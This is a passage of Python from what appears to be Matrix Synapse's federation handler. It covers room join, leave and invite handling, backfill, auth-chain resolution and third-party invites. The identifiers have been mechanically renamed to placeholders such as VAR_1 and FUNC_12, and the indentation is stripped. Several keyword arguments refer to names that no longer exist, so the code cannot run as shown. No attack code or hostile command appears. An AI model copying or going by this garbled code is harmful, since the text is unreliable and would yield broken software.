raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(VAR_21.auth_event_ids()) > 10:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i auth_events",
VAR_21.event_id,
len(VAR_21.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def FUNC_10(self, VAR_22, VAR_1):
VAR_6 = await self.federation_client.send_invite(
VAR_10=VAR_22,
VAR_11=VAR_1.room_id,
VAR_12=VAR_1.event_id,
VAR_6=VAR_1,
)
return VAR_6
async def FUNC_11(self, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12)
VAR_89 = await self.store.get_auth_chain(
list(VAR_1.auth_event_ids()), include_given=True
)
return list(VAR_89)
async def FUNC_12(
self, VAR_23: Iterable[str], VAR_11: str, VAR_24: str, VAR_25: JsonDict
) -> Tuple[str, int]:
assert self.config.worker.worker_app is None
VAR_0.debug("Joining %s to %s", VAR_24, VAR_11)
VAR_5, VAR_1, VAR_90 = await self._make_and_verify_event(
VAR_23,
VAR_11,
VAR_24,
"join",
VAR_25,
VAR_30={"ver": KNOWN_ROOM_VERSIONS},
)
assert VAR_11 not in self.room_queues
self.room_queues[VAR_11] = []
await self._clean_room_for_join(VAR_11)
VAR_91 = set()
try:
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
VAR_117 = await self.federation_client.send_join(
VAR_98, VAR_1, VAR_90
)
VAR_5 = VAR_117["origin"]
VAR_2 = VAR_117["state"]
VAR_63 = VAR_117["auth_chain"]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
VAR_91.update([s.event_id for s in VAR_2])
VAR_91.update([a.event_id for a in VAR_63])
VAR_91.add(VAR_1.event_id)
VAR_0.debug("do_invite_join VAR_63: %s", VAR_63)
VAR_0.debug("do_invite_join VAR_2: %s", VAR_2)
VAR_0.debug("do_invite_join VAR_1: %s", VAR_1)
await self.store.upsert_room_on_join(
VAR_11=room_id, VAR_28=VAR_90,
)
VAR_163 = await self._persist_auth_tree(
VAR_5, VAR_11, VAR_63, VAR_2, VAR_1, VAR_90
)
await self._replication.wait_for_stream_position(
self.config.worker.events_shard_config.get_instance(VAR_11),
"events",
VAR_163,
)
VAR_164 = await self.store.get_room_predecessor(VAR_11)
if not VAR_164 or not isinstance(VAR_164.get("room_id"), str):
return VAR_1.event_id, VAR_163
VAR_165 = VAR_164["room_id"]
VAR_0.debug(
"Found VAR_164 for %s during remote join: %s", VAR_11, VAR_165
)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.transfer_room_state_on_room_upgrade(
VAR_165, VAR_11
)
VAR_0.debug("Finished joining %s to %s", VAR_24, VAR_11)
return VAR_1.event_id, VAR_163
finally:
VAR_26 = self.room_queues[VAR_11]
del self.room_queues[VAR_11]
run_in_background(self._handle_queued_pdus, VAR_26)
async def FUNC_13(self, VAR_26):
for p, VAR_5 in VAR_26:
try:
VAR_0.info(
"Processing queued PDU %s which was received "
"while we were joining %s",
p.event_id,
p.room_id,
)
with nested_logging_context(p.event_id):
await self.on_receive_pdu(VAR_5, p, VAR_7=True)
except Exception as VAR_170:
VAR_0.warning(
"Error handling queued PDU %s from %s: %s", p.event_id, VAR_5, VAR_170
)
async def FUNC_14(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_join request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"Got /make_join request for room %s we are no longer in", VAR_11,
)
raise NotFoundError("Not an active room on this server")
VAR_92 = {"membership": Membership.JOIN}
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": VAR_92,
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
try:
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
except SynapseError as VAR_170:
VAR_0.warning("Failed to create join to %s because %s", VAR_11, VAR_170)
raise
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
return VAR_1
async def FUNC_15(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_join_request from %s: Got VAR_1: %s, signatures: %s",
VAR_5,
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_join request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
VAR_1.internal_metadata.send_on_behalf_of = VAR_5
VAR_32 = await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_join_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_95 = list(VAR_94.values())
VAR_63 = await self.store.get_auth_chain(VAR_95)
VAR_2 = await self.store.get_events(list(VAR_94.values()))
return {"state": list(VAR_2.values()), "auth_chain": VAR_63}
async def FUNC_16(
self, VAR_5: str, VAR_1: EventBase, VAR_28: RoomVersion
):
if VAR_1.state_key is None:
raise SynapseError(400, "The invite VAR_1 did not have a VAR_2 key")
VAR_96 = await self.store.is_room_blocked(VAR_1.room_id)
if VAR_96:
raise SynapseError(403, "This room has been blocked on this server")
if self.hs.config.block_non_admin_invites:
raise SynapseError(403, "This server does not accept room invites")
if not self.spam_checker.user_may_invite(
VAR_1.sender, VAR_1.state_key, VAR_1.room_id
):
raise SynapseError(
403, "This user is not permitted to send invites to this server/user"
)
VAR_29 = VAR_1.content.get("membership")
if VAR_1.type != VAR_188.Member or VAR_29 != Membership.INVITE:
raise SynapseError(400, "The VAR_1 was not an m.room.member invite event")
VAR_97 = get_domain_from_id(VAR_1.sender)
if VAR_97 != VAR_5:
raise SynapseError(
400, "The invite VAR_1 was not from the server sending it"
)
if not self.is_mine_id(VAR_1.state_key):
raise SynapseError(400, "The invite VAR_1 must be for this server")
if VAR_1.state_key == self._server_notices_mxid:
raise SynapseError(HTTPStatus.FORBIDDEN, "Cannot invite this user")
await self._maybe_store_room_on_outlier_membership(
VAR_11=VAR_1.room_id, VAR_28=room_version
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_1.signatures.update(
compute_event_signature(
VAR_28,
VAR_1.get_pdu_json(),
self.hs.hostname,
self.hs.signing_key,
)
)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
await self.persist_events_and_notify(VAR_1.room_id, [(VAR_1, VAR_32)])
return VAR_1
async def FUNC_17(
self, VAR_23: Iterable[str], VAR_11: str, VAR_27: str, VAR_25: JsonDict
) -> Tuple[EventBase, int]:
VAR_5, VAR_1, VAR_28 = await self._make_and_verify_event(
VAR_23, VAR_11, VAR_27, "leave", VAR_25=content
)
VAR_1.internal_metadata.outlier = True
VAR_1.internal_metadata.out_of_band_membership = True
VAR_98 = list(VAR_23)
try:
VAR_98.remove(VAR_5)
VAR_98.insert(0, VAR_5)
except ValueError:
pass
await self.federation_client.send_leave(VAR_98, VAR_1)
VAR_32 = await self.state_handler.compute_event_context(VAR_1)
VAR_99 = await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)]
)
return VAR_1, VAR_99
async def FUNC_18(
self,
VAR_23: Iterable[str],
VAR_11: str,
VAR_27: str,
VAR_29: str,
VAR_25: JsonDict = {},
VAR_30: Optional[Dict[str, Union[str, Iterable[str]]]] = None,
) -> Tuple[str, EventBase, RoomVersion]:
(
VAR_5,
VAR_1,
VAR_28,
) = await self.federation_client.make_membership_event(
VAR_23, VAR_11, VAR_27, VAR_29, VAR_25, VAR_30=params
)
VAR_0.debug("Got VAR_183 to make_%s: %s", VAR_29, VAR_1)
assert VAR_1.type == VAR_188.Member
assert VAR_1.user_id == VAR_27
assert VAR_1.state_key == VAR_27
assert VAR_1.room_id == VAR_11
return VAR_5, VAR_1, VAR_28
async def FUNC_19(
self, VAR_5: str, VAR_11: str, VAR_27: str
) -> EventBase:
if get_domain_from_id(VAR_27) != VAR_5:
VAR_0.info(
"Got /make_leave request for user %r from different VAR_5 %s, ignoring",
VAR_27,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_93 = self.event_builder_factory.new(
VAR_28,
{
"type": VAR_188.Member,
"content": {"membership": Membership.LEAVE},
"room_id": VAR_11,
"sender": VAR_27,
"state_key": VAR_27,
},
)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
try:
await self.auth.check_from_context(
VAR_28, VAR_1, VAR_32, do_sig_check=False
)
except AuthError as VAR_170:
VAR_0.warning("Failed to create new leave %r because %s", VAR_1, VAR_170)
raise VAR_170
return VAR_1
async def FUNC_20(self, VAR_5, VAR_6):
VAR_1 = VAR_6
VAR_0.debug(
"on_send_leave_request: Got VAR_1: %s, signatures: %s",
VAR_1.event_id,
VAR_1.signatures,
)
if get_domain_from_id(VAR_1.sender) != VAR_5:
VAR_0.info(
"Got /send_leave request for user %r from different VAR_5 %s",
VAR_1.sender,
VAR_5,
)
raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
VAR_1.internal_metadata.outlier = False
await self._handle_new_event(VAR_5, VAR_1)
VAR_0.debug(
"on_send_leave_request: After FUNC_26: %s, sigs: %s",
VAR_1.event_id,
VAR_1.signatures,
)
return None
async def FUNC_21(self, VAR_11: str, VAR_12: str) -> List[EventBase]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_2}
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_200 = await self.store.get_event(VAR_198)
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_200
else:
del VAR_167[(VAR_1.type, VAR_1.state_key)]
VAR_168 = list(VAR_167.values())
return VAR_168
else:
return []
async def FUNC_22(self, VAR_11: str, VAR_12: str) -> List[str]:
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
VAR_100 = await self.state_store.get_state_groups_ids(VAR_11, [VAR_12])
if VAR_100:
VAR_166, VAR_2 = list(VAR_100.items()).pop()
VAR_167 = VAR_2
if VAR_1.is_state():
if "replaces_state" in VAR_1.unsigned:
VAR_198 = VAR_1.unsigned["replaces_state"]
if VAR_198 != VAR_1.event_id:
VAR_167[(VAR_1.type, VAR_1.state_key)] = VAR_198
else:
VAR_167.pop((VAR_1.type, VAR_1.state_key), None)
return list(VAR_167.values())
else:
return []
@log_function
async def FUNC_23(
self, VAR_5: str, VAR_11: str, VAR_31: List[str], VAR_17: int
) -> List[EventBase]:
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_17 = min(VAR_17, 100)
VAR_20 = await self.store.get_backfill_events(VAR_11, VAR_31, VAR_17)
VAR_20 = await filter_events_for_server(self.storage, VAR_5, VAR_20)
return VAR_20
@log_function
async def FUNC_24(
self, VAR_5: str, VAR_12: str
) -> Optional[EventBase]:
VAR_1 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
if VAR_1:
VAR_101 = await self.auth.check_host_in_room(VAR_1.room_id, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_20 = await filter_events_for_server(self.storage, VAR_5, [VAR_1])
VAR_1 = VAR_20[0]
return VAR_1
else:
return None
async def FUNC_25(self, VAR_32):
return await self.store.get_min_depth(VAR_32)
async def FUNC_26(
self, VAR_5, VAR_1, VAR_2=None, VAR_3=None, VAR_33=False
):
VAR_32 = await self._prep_event(
VAR_5, VAR_1, VAR_2=state, VAR_3=auth_events, VAR_33=backfilled
)
try:
if (
not VAR_1.internal_metadata.is_outlier()
and not VAR_33
and not VAR_32.rejected
):
await self.action_generator.handle_push_actions_for_event(
VAR_1, VAR_32
)
await self.persist_events_and_notify(
VAR_1.room_id, [(VAR_1, VAR_32)], VAR_33=backfilled
)
except Exception:
run_in_background(
self.store.remove_push_actions_from_staging, VAR_1.event_id
)
raise
return VAR_32
async def FUNC_27(
self,
VAR_5: str,
VAR_11: str,
VAR_34: Iterable[CLASS_0],
VAR_33: bool = False,
) -> None:
async def FUNC_49(VAR_102: CLASS_0):
VAR_1 = VAR_102.event
with nested_logging_context(suffix=VAR_1.event_id):
VAR_168 = await self._prep_event(
VAR_5,
VAR_1,
VAR_2=VAR_102.state,
VAR_3=VAR_102.auth_events,
VAR_33=backfilled,
)
return VAR_168
VAR_103 = await make_deferred_yieldable(
defer.gatherResults(
[run_in_background(FUNC_49, VAR_102) for VAR_102 in VAR_34],
consumeErrors=True,
)
)
await self.persist_events_and_notify(
VAR_11,
[
(VAR_102.event, VAR_32)
for VAR_102, VAR_32 in zip(VAR_34, VAR_103)
],
VAR_33=backfilled,
)
async def FUNC_28(
self,
VAR_5: str,
VAR_11: str,
VAR_3: List[EventBase],
VAR_2: List[EventBase],
VAR_1: EventBase,
VAR_28: RoomVersion,
) -> int:
VAR_104 = {}
for VAR_170 in itertools.chain(VAR_3, VAR_2):
VAR_170.internal_metadata.outlier = True
VAR_169 = await self.state_handler.compute_event_context(VAR_170)
VAR_104[VAR_170.event_id] = VAR_169
VAR_60 = {
VAR_170.event_id: VAR_170 for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1])
}
VAR_105 = None
for VAR_170 in VAR_3:
if (VAR_170.type, VAR_170.state_key) == (VAR_188.Create, ""):
VAR_105 = VAR_170
break
if VAR_105 is None:
raise SynapseError(400, "No create VAR_1 in state")
VAR_106 = VAR_105.content.get(
"room_version", RoomVersions.V1.identifier
)
if VAR_28.identifier != VAR_106:
raise SynapseError(400, "Room version mismatch")
VAR_107 = set()
for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
for VAR_160 in VAR_170.auth_event_ids():
if VAR_160 not in VAR_60:
VAR_107.add(VAR_160)
for VAR_160 in VAR_107:
VAR_171 = await self.federation_client.get_pdu(
[VAR_5], VAR_160, VAR_28=room_version, outlier=True, timeout=10000,
)
if VAR_171 and VAR_171.event_id == VAR_160:
VAR_60[VAR_160] = VAR_171
else:
VAR_0.info("Failed to find VAR_89 VAR_1 %r", VAR_160)
for VAR_170 in itertools.chain(VAR_3, VAR_2, [VAR_1]):
VAR_172 = {
(VAR_60[VAR_160].type, VAR_60[VAR_160].state_key): VAR_60[VAR_160]
for VAR_160 in VAR_170.auth_event_ids()
if VAR_160 in VAR_60
}
if VAR_105:
VAR_172[(VAR_188.Create, "")] = VAR_105
try:
event_auth.check(VAR_28, VAR_170, VAR_3=VAR_172)
except SynapseError as err:
VAR_0.warning("Rejecting %s because %s", VAR_170.event_id, err.msg)
if VAR_170 == VAR_1:
raise
VAR_104[VAR_170.event_id].rejected = RejectedReason.AUTH_ERROR
await self.persist_events_and_notify(
VAR_11,
[
(VAR_170, VAR_104[VAR_170.event_id])
for VAR_170 in itertools.chain(VAR_3, VAR_2)
],
)
VAR_108 = await self.state_handler.compute_event_context(
VAR_1, old_state=VAR_2
)
return await self.persist_events_and_notify(
VAR_11, [(VAR_1, VAR_108)]
)
async def FUNC_29(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_2: Optional[Iterable[EventBase]],
VAR_3: Optional[MutableStateMap[EventBase]],
VAR_33: bool,
) -> EventContext:
VAR_32 = await self.state_handler.compute_event_context(VAR_1, old_state=VAR_2)
if not VAR_3:
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_173 = self.auth.compute_auth_events(
VAR_1, VAR_94, for_verification=True
)
VAR_174 = await self.store.get_events(VAR_173)
VAR_3 = {(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_174.values()}
if VAR_1.type == VAR_188.Member and not VAR_1.auth_event_ids():
if len(VAR_1.prev_event_ids()) == 1 and VAR_1.depth < 5:
VAR_189 = await self.store.get_event(
VAR_1.prev_event_ids()[0], allow_none=True
)
if VAR_189 and VAR_189.type == VAR_188.Create:
VAR_3[(VAR_189.type, VAR_189.state_key)] = VAR_189
VAR_32 = await self.do_auth(VAR_5, VAR_1, VAR_32, VAR_3=auth_events)
if not VAR_32.rejected:
await self._check_for_soft_fail(VAR_1, VAR_2, VAR_33)
if VAR_1.type == VAR_188.GuestAccess and not VAR_32.rejected:
await self.maybe_kick_guest_users(VAR_1)
return VAR_32
async def FUNC_30(
self, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]], VAR_33: bool
) -> None:
if VAR_33 or VAR_1.internal_metadata.is_outlier():
return
VAR_109 = await self.store.get_latest_event_ids_in_room(VAR_1.room_id)
VAR_110 = set(VAR_109)
VAR_111 = set(VAR_1.prev_event_ids())
if VAR_110 == VAR_111:
return
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
if VAR_2 is not None:
VAR_175 = await self.state_store.get_state_groups(
VAR_1.room_id, VAR_110
)
VAR_176 = list(VAR_175.values()) # type: List[Iterable[EventBase]]
VAR_176.append(VAR_2)
VAR_177 = await self.state_handler.resolve_events(
VAR_28, VAR_176, VAR_1
)
VAR_126 = {
k: VAR_170.event_id for k, VAR_170 in VAR_177.items()
} # type: StateMap[str]
else:
VAR_126 = await self.state_handler.get_current_state_ids(
VAR_1.room_id, latest_event_ids=VAR_110
)
VAR_0.debug(
"Doing soft-fail check for %s: VAR_2 %s", VAR_1.event_id, VAR_126,
)
VAR_112 = auth_types_for_event(VAR_1)
VAR_113 = [
VAR_170 for k, VAR_170 in VAR_126.items() if k in VAR_112
]
VAR_114 = await self.store.get_events(VAR_113)
VAR_115 = {
(VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_114.values()
}
try:
event_auth.check(VAR_90, VAR_1, VAR_3=VAR_115)
except AuthError as VAR_170:
VAR_0.warning("Soft-failing %r because %s", VAR_1, VAR_170)
VAR_1.internal_metadata.soft_failed = True
async def FUNC_31(
self, VAR_5, VAR_12, VAR_11, VAR_35, VAR_36, VAR_37
):
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
for VAR_170 in VAR_35:
try:
await self._handle_new_event(VAR_5, VAR_170)
except AuthError:
pass
VAR_116 = await self.store.get_auth_chain(
list(VAR_1.auth_event_ids()), include_given=True
)
VAR_117 = await self.construct_auth_difference(VAR_116, VAR_35)
VAR_0.debug("on_query_auth returning: %s", VAR_117)
return VAR_117
async def FUNC_32(
self, VAR_5, VAR_11, VAR_38, VAR_39, VAR_17
):
VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
if not VAR_101:
raise AuthError(403, "Host not in room.")
VAR_17 = min(VAR_17, 20)
VAR_65 = await self.store.get_missing_events(
VAR_11=room_id,
VAR_38=earliest_events,
VAR_39=latest_events,
VAR_17=limit,
)
VAR_65 = await filter_events_for_server(
self.storage, VAR_5, VAR_65
)
return VAR_65
async def FUNC_33(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_32: EventContext,
VAR_3: MutableStateMap[EventBase],
) -> EventContext:
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
try:
VAR_32 = await self._update_auth_events_and_context_for_auth(
VAR_5, VAR_1, VAR_32, VAR_3
)
except Exception:
VAR_0.exception(
"Failed to double check VAR_89 VAR_20 for %s with remote. "
"Ignoring failure and continuing processing of VAR_1.",
VAR_1.event_id,
)
try:
event_auth.check(VAR_90, VAR_1, VAR_3=auth_events)
except AuthError as VAR_170:
VAR_0.warning("Failed VAR_89 resolution for %r because %s", VAR_1, VAR_170)
VAR_32.rejected = RejectedReason.AUTH_ERROR
return VAR_32
async def FUNC_34(
self,
VAR_5: str,
VAR_1: EventBase,
VAR_32: EventContext,
VAR_3: MutableStateMap[EventBase],
) -> EventContext:
VAR_118 = set(VAR_1.auth_event_ids())
VAR_119 = VAR_118.difference(
VAR_170.event_id for VAR_170 in VAR_3.values()
)
if VAR_119:
VAR_178 = await self.store.have_seen_events(VAR_119)
VAR_0.debug("Events %s are in the store", VAR_178)
VAR_119.difference_update(VAR_178)
if VAR_119:
VAR_0.info("auth_events contains unknown VAR_20: %s", VAR_119)
try:
try:
VAR_35 = await self.federation_client.get_event_auth(
VAR_5, VAR_1.room_id, VAR_1.event_id
)
except RequestSendFailed as e1:
VAR_0.info("Failed to get VAR_1 VAR_89 from remote: %s", e1)
return VAR_32
VAR_190 = await self.store.have_seen_events(
[VAR_170.event_id for VAR_170 in VAR_35]
)
for VAR_170 in VAR_35:
if VAR_170.event_id in VAR_190:
continue
if VAR_170.event_id == VAR_1.event_id:
continue
try:
VAR_201 = VAR_170.auth_event_ids()
VAR_89 = {
(VAR_170.type, VAR_170.state_key): VAR_170
for VAR_170 in VAR_35
if VAR_170.event_id in VAR_201 or VAR_170.type == VAR_188.Create
}
VAR_170.internal_metadata.outlier = True
VAR_0.debug(
"do_auth %s VAR_119: %s", VAR_1.event_id, VAR_170.event_id
)
await self._handle_new_event(VAR_5, VAR_170, VAR_3=VAR_89)
if VAR_170.event_id in VAR_118:
VAR_3[(VAR_170.type, VAR_170.state_key)] = VAR_170
except AuthError:
pass
except Exception:
VAR_0.exception("Failed to get VAR_89 chain")
if VAR_1.internal_metadata.is_outlier():
VAR_0.info("Skipping auth_event fetch for outlier")
return VAR_32
VAR_120 = VAR_118.difference(
VAR_170.event_id for VAR_170 in VAR_3.values()
)
if not VAR_120:
return VAR_32
VAR_0.info(
"auth_events refers to VAR_20 which are not in our calculated VAR_89 "
"chain: %s",
VAR_120,
)
VAR_121 = await self.store.get_events_as_list(VAR_120)
for d in VAR_121:
if d.room_id != VAR_1.room_id:
VAR_0.warning(
"Event %s refers to auth_event %s which is in a different room",
VAR_1.event_id,
d.event_id,
)
return VAR_32
VAR_122 = VAR_3.values()
VAR_123 = dict(VAR_3)
VAR_123.update({(d.type, d.state_key): d for d in VAR_121})
VAR_62 = VAR_123.values()
VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
VAR_124 = await self.state_handler.resolve_events(
VAR_28, (VAR_122, VAR_62), VAR_1
)
VAR_0.info(
"After VAR_2 VAR_168: updating VAR_3 with new VAR_2 %s",
{
(d.type, d.state_key): d.event_id
for d in VAR_124.values()
if VAR_3.get((d.type, d.state_key)) != d
},
)
VAR_3.update(VAR_124)
VAR_32 = await self._update_context_for_auth_events(
VAR_1, VAR_32, VAR_3
)
return VAR_32
async def FUNC_35(
self, VAR_1: EventBase, VAR_32: EventContext, VAR_3: StateMap[EventBase]
) -> EventContext:
if VAR_1.is_state():
VAR_179 = (VAR_1.type, VAR_1.state_key) # type: Optional[Tuple[str, str]]
else:
VAR_179 = None
VAR_125 = {
k: a.event_id for k, a in VAR_3.items() if k != VAR_179
}
VAR_126 = await VAR_32.get_current_state_ids()
VAR_126 = dict(VAR_126) # type: ignore
VAR_126.update(VAR_125)
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_94 = dict(VAR_94)
prev_state_ids.update({k: a.event_id for k, a in VAR_3.items()})
VAR_127 = VAR_32.state_group
VAR_128 = await self.state_store.store_state_group(
VAR_1.event_id,
VAR_1.room_id,
VAR_127=prev_group,
delta_ids=VAR_125,
VAR_126=current_state_ids,
)
return EventContext.with_state(
VAR_128=state_group,
state_group_before_event=VAR_32.state_group_before_event,
VAR_126=current_state_ids,
VAR_94=prev_state_ids,
VAR_127=prev_group,
delta_ids=VAR_125,
)
async def FUNC_36(
self, VAR_40: Iterable[EventBase], VAR_41: Iterable[EventBase]
) -> Dict:
VAR_0.debug("construct_auth_difference Start!")
def FUNC_50(VAR_21):
return VAR_21.depth, VAR_21.event_id
VAR_0.debug("construct_auth_difference after FUNC_50!")
VAR_129 = list(VAR_41)
VAR_129.sort(VAR_144=FUNC_50)
VAR_130 = list(VAR_40)
VAR_130.sort(VAR_144=FUNC_50)
VAR_131 = iter(VAR_130)
VAR_132 = iter(VAR_129)
VAR_0.debug("construct_auth_difference before FUNC_51!")
def FUNC_51(VAR_133, VAR_134=None):
try:
return next(VAR_133)
except Exception:
return VAR_134
VAR_135 = FUNC_51(VAR_131)
VAR_136 = FUNC_51(VAR_132)
VAR_0.debug("construct_auth_difference before while")
VAR_137 = []
VAR_138 = []
while VAR_135 or VAR_136:
if VAR_136 is None:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
continue
if VAR_135 is None:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.event_id == VAR_136.event_id:
VAR_135 = FUNC_51(VAR_131)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.depth < VAR_136.depth:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
continue
if VAR_135.depth > VAR_136.depth:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.event_id < VAR_136.event_id:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
if VAR_135.event_id > VAR_136.event_id:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
VAR_0.debug("construct_auth_difference after while")
VAR_139 = [VAR_170.event_id for VAR_170 in VAR_137]
VAR_140 = list(VAR_137)
for VAR_170 in VAR_137:
for VAR_160 in VAR_170.auth_event_ids():
if VAR_160 in VAR_139:
try:
VAR_140.remove(VAR_170)
except ValueError:
pass
VAR_141 = {}
for VAR_170 in VAR_140:
VAR_180 = await self.store.get_rejection_reason(VAR_170.event_id)
if VAR_180 is None:
continue
VAR_141[VAR_170.event_id] = VAR_180
VAR_0.debug("construct_auth_difference returning")
return {
"auth_chain": VAR_40,
"rejects": {
VAR_170.event_id: {"reason": VAR_141[VAR_170.event_id], "proof": None}
for VAR_170 in VAR_140
},
"missing": [VAR_170.event_id for VAR_170 in VAR_138],
}
@log_function
async def FUNC_37(
self, VAR_42, VAR_43, VAR_11, VAR_44
):
VAR_142 = {"signed": VAR_44}
VAR_45 = {
"type": VAR_188.Member,
"content": {
"membership": Membership.INVITE,
"third_party_invite": VAR_142,
},
"room_id": VAR_11,
"sender": VAR_42,
"state_key": VAR_43,
}
if await self.auth.check_host_in_room(VAR_11, self.hs.hostname):
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
EventValidator().validate_builder(VAR_93)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
VAR_28, VAR_45, VAR_1, VAR_32
)
EventValidator().validate_new(VAR_1, self.config)
VAR_1.internal_metadata.send_on_behalf_of = self.hs.hostname
try:
await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
except AuthError as VAR_170:
VAR_0.warning("Denying new third party invite %r because %s", VAR_1, VAR_170)
raise VAR_170
await self._check_signature(VAR_1, VAR_32)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.send_membership_event(None, VAR_1, VAR_32)
else:
VAR_181 = {VAR_204.split(":", 1)[-1] for VAR_204 in (VAR_42, VAR_11)}
await self.federation_client.forward_third_party_invite(
VAR_181, VAR_11, VAR_45
)
async def FUNC_38(
self, VAR_45: JsonDict
) -> None:
assert_params_in_dict(VAR_45, ["room_id"])
VAR_28 = await self.store.get_room_version_id(VAR_45["room_id"])
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
VAR_28, VAR_45, VAR_1, VAR_32
)
try:
await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
except AuthError as VAR_170:
VAR_0.warning("Denying third party invite %r because %s", VAR_1, VAR_170)
raise VAR_170
await self._check_signature(VAR_1, VAR_32)
VAR_1.internal_metadata.send_on_behalf_of = get_domain_from_id(VAR_1.sender)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.send_membership_event(None, VAR_1, VAR_32)
async def FUNC_39(
self, VAR_28, VAR_45, VAR_1, VAR_32
):
VAR_144 = (
VAR_188.ThirdPartyInvite,
VAR_1.content["third_party_invite"]["signed"]["token"],
)
VAR_145 = None
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_146 = VAR_94.get(VAR_144)
if VAR_146:
VAR_145 = await self.store.get_event(
VAR_146, allow_none=True
)
if VAR_145:
VAR_182 = VAR_145.content.get("display_name")
VAR_45["content"]["third_party_invite"]["display_name"] = VAR_182
else:
VAR_0.info(
"Could not find invite VAR_1 for VAR_142: %r", VAR_45
)
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
EventValidator().validate_builder(VAR_93)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
EventValidator().validate_new(VAR_1, self.config)
return (VAR_1, VAR_32)
async def FUNC_40(self, VAR_1, VAR_32):
VAR_44 = VAR_1.content["third_party_invite"]["signed"]
